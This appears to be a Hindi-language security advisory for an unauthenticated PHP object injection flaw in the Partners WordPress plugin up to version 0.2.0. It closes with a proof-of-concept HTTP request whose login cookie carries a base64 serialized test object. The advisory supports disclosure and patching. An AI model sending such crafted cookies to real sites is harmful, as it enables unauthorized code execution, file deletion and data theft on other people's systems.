
Partners <= 0.2.0 - बिना प्रमाणीकरण के PHP ऑब्जेक्ट इंजेक्शन
पार्टनर्स <= 0.2.0 - अप्रमाणित PHP ऑब्जेक्ट इंजेक्शन
वर्डप्रेस के लिए पार्टनर्स प्लगइन संस्करण 0.2.0 तक और सहित, अविश्वसनीय इनपुट के डिसीरियलाइज़ेशन के माध्यम से PHP ऑब्जेक्ट इंजेक्शन के लिए कमजोर है। इससे अप्रमाणित हमलावरों के लिए PHP ऑब्जेक्ट इंजेक्ट करना संभव हो जाता है। कमजोर सॉफ्टवेयर में कोई ज्ञात POP श्रृंखला मौजूद नहीं है। यदि लक्ष्य सिस्टम पर स्थापित किसी अतिरिक्त प्लगइन या थीम के माध्यम से POP श्रृंखला मौजूद है, तो यह हमलावर को मनमानी फ़ाइलों को हटाने, संवेदनशील डेटा प्राप्त करने या कोड निष्पादित करने की अनुमति दे सकता है।
GET /partners/ HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: mighty_partners_login=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=